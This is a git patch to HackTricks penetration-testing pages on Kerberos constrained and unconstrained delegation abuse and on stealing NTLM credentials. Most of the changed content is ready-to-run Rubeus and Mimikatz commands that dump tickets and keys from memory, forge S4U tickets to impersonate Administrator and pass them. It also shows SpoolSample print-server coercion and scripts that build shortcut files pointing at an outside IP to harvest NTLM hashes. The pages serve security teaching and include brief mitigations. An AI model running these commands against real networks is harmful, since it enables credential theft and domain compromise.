From 15d0b1440912ee07d193138c00cbc5b84a34aae3 Mon Sep 17 00:00:00 2001 From: CPol Date: Sun, 14 Aug 2022 19:18:19 +0000 Subject: [PATCH] GitBook: [#3380] No subject --- .../constrained-delegation.md | 49 ++++++++++++++----- .../unconstrained-delegation.md | 28 +++++------ .../ntlm/places-to-steal-ntlm-creds.md | 8 +-- 3 files changed, 53 insertions(+), 32 deletions(-) diff --git a/windows-hardening/active-directory-methodology/constrained-delegation.md b/windows-hardening/active-directory-methodology/constrained-delegation.md index 4af768893..5657af32a 100644 --- a/windows-hardening/active-directory-methodology/constrained-delegation.md +++ b/windows-hardening/active-directory-methodology/constrained-delegation.md @@ -18,9 +18,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) ## Constrained Delegation -Using this a Domain admin can allow 3rd parties to impersonate a user or computer against a service of a machine. +Using this a Domain admin can **allow** a computer to **impersonate a user or computer** against a **service** of a machine. -* **Service for User to self (**_**S4U2self**_**):** If a **service account** has a _userAccountControl_ value containing [TRUSTED\_TO\_AUTH\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) (T2A4D), then it can obtains a TGS for itself (the service) on behalf of any other user. +* **Service for User to self (**_**S4U2self**_**):** If a **service account** has a _userAccountControl_ value containing [TRUSTED\_TO\_AUTH\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) (T2A4D), then it can obtain a TGS for itself (the service) on behalf of any other user. * **Service for User to Proxy(**_**S4U2proxy**_**):** A **service account** could obtain a TGS on behalf any user to the service set in **msDS-AllowedToDelegateTo.** To do so, it first need a TGS from that user to itself, but it can use S4U2self to obtain that TGS before requesting the other one. **Note**: If a user is marked as ‘_Account is sensitive and cannot be delegated_ ’ in AD, you will **not be able to impersonate** them. @@ -36,32 +36,55 @@ Moreover, notice that if you have access to **LDAP service on DC**, you will hav #ADSearch ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json -{% code title="Using kekeo.exe + Mimikatz.exe" %} -```bash -#Obtain a TGT for the Constained allowed user +
# The first step is to get a TGT of the service taht can impersonate others
+## If you are SYSTEM in the server, you might take it from memory
+.\Rubeus.exe triage
+.\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap
+
+# If you are SYSTEM, you might get the AES key or the RC4 hash from memory and request one
+## Get AES/RC4 with mimikatz
+mimikatz sekurlsa::ekeys
+
+## Request with aes
+tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05
+.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /opsec /nowrap
+
+# Request with RC4
 tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
-#Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP)
-tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL
-#Load the TGS in memory
-Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'  
-```
-{% endcode %}
+.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi
{% code title="Using Rubeus" %} ```bash -#Obtain a TGT for the Constained allowed user -.\Rubeus.exe asktgt /user:websvc /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi #Obtain a TGS of the Administrator user to self .\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /impersonateuser:Administrator /outfile:TGS_administrator + #Obtain service TGS impersonating Administrator (CIFS) .\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /outfile:TGS_administrator_CIFS + #Impersonate Administrator on different service (HOST) .\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /altservice:HOST /outfile:TGS_administrator_HOST + +# Get S4U TGS + Service impersonated ticket in 1 cmd (instead of 2) +\.Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /user:dcorp-adminsrv$ /ticket:TGT_websvc.kirbi /nowrap + #Load ticket in memory .\Rubeus.exe ptt /ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local ``` {% endcode %} +{% code title="kekeo + Mimikatz" %} +```bash +#Obtain a TGT for the Constained allowed user +tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d + +#Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP) +tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL + +#Load the TGS in memory +Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"' +``` +{% endcode %} + ### Mitigation * Disable kerberos delegation where possible diff --git a/windows-hardening/active-directory-methodology/unconstrained-delegation.md b/windows-hardening/active-directory-methodology/unconstrained-delegation.md index c70a7e4dd..747f76217 100644 --- a/windows-hardening/active-directory-methodology/unconstrained-delegation.md +++ b/windows-hardening/active-directory-methodology/unconstrained-delegation.md @@ -1,4 +1,4 @@ -# Unconstrained Delegation +
@@ -16,7 +16,8 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## Unconstrained delegation + +# Unconstrained delegation This a feature that a Domain Administrator can set to any **Computer** inside the domain. Then, anytime a **user logins** onto the Computer, a **copy of the TGT** of that user is going to be **sent inside the TGS** provided by the DC **and saved in memory in LSASS**. So, if you have Administrator privileges on the machine, you will be able to **dump the tickets and impersonate the users** on any machine. @@ -24,25 +25,19 @@ So if a domain admin logins inside a Computer with "Unconstrained Delegation" fe You can **find Computer objects with this attribute** checking if the [userAccountControl](https://msdn.microsoft.com/en-us/library/ms680832\(v=vs.85\).aspx) attribute contains [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx). You can do this with an LDAP filter of ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, which is what powerview does: -
# List unconstrained computers
-## Powerview
+```bash
 Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
-## ADSearch
-ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
-
-# Export tickets with Mimikatz
-privilege::debug
+#Export tickets with Mimikatz
+privilege::debug
 sekurlsa::tickets /export #Recommended way
 kerberos::list /export #Another way
-
-# Monitor logins and export new tickets
-.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTs
+``` Load the ticket of Administrator (or victim user) in memory with **Mimikatz** or **Rubeus for a** [**Pass the Ticket**](pass-the-ticket.md)**.**\ More info: [https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\ [**More information about Unconstrained delegation in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation) -### **Automatically compromising a Print server** +## **Automatically compromising a Print server** If an attacker is able to **compromise a computer allowed for "Unconstrained Delegation"**, he could **trick** a **Print server** to **automatically login** against it **saving a TGT** in the memory of the server.\ Then, the attacker could perform a **Pass the Ticket attack to impersonate** the user Print server computer account. @@ -50,17 +45,18 @@ Then, the attacker could perform a **Pass the Ticket attack to impersonate** the To make a print server login against any machine you can use [**SpoolSample**](https://github.com/leechristensen/SpoolSample): ```bash -.\SpoolSample.exe +.\SpoolSample.exe printmachine unconstrinedmachine ``` If the TGT if from a domain controller, you could perform a[ **DCSync attack**](acl-persistence-abuse.md#dcsync) and obtain all the hashes from the DC.\ [**More info about this attack in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation) -### Mitigation +## Mitigation * Limit DA/Admin logins to specific services * Set "Account is sensitive and cannot be delegated" for privileged accounts. +
Support HackTricks and get benefits! @@ -76,3 +72,5 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+ + diff --git a/windows-hardening/ntlm/places-to-steal-ntlm-creds.md b/windows-hardening/ntlm/places-to-steal-ntlm-creds.md index 97a9256c8..64f2bbc50 100644 --- a/windows-hardening/ntlm/places-to-steal-ntlm-creds.md +++ b/windows-hardening/ntlm/places-to-steal-ntlm-creds.md @@ -237,7 +237,7 @@ IconIndex=1337 We can create a shortcut containing our network path and as you as you open the shortcut Windows will try to resolve the network path. You can also specify a keyboard shortcut to trigger the shortcut. For the icon you can give the name of a Windows binary or choose an icon from either shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll or wmploc.dll located in the system32 directory. -```powershell +``` Set shl = CreateObject("WScript.Shell") Set fso = CreateObject("Scripting.FileSystemObject") currentFolder = shl.CurrentDirectory @@ -254,7 +254,7 @@ sc.Save The Powershell version. -```powershell +``` $objShell = New-Object -ComObject WScript.Shell $lnk = $objShell.CreateShortcut("StealMyHashes.lnk") $lnk.TargetPath = "\\35.164.153.224\@OsandaMalith" @@ -269,7 +269,7 @@ $lnk.Save() Another shortcut in Windows is the Internet shortcuts. You can save this as something.url -```bash +``` echo [InternetShortcut] > stealMyHashes.url echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url ``` @@ -301,7 +301,7 @@ Start-Process \\192.168.0.1\aa IE will resolve UNC paths. For example -```html +``` ```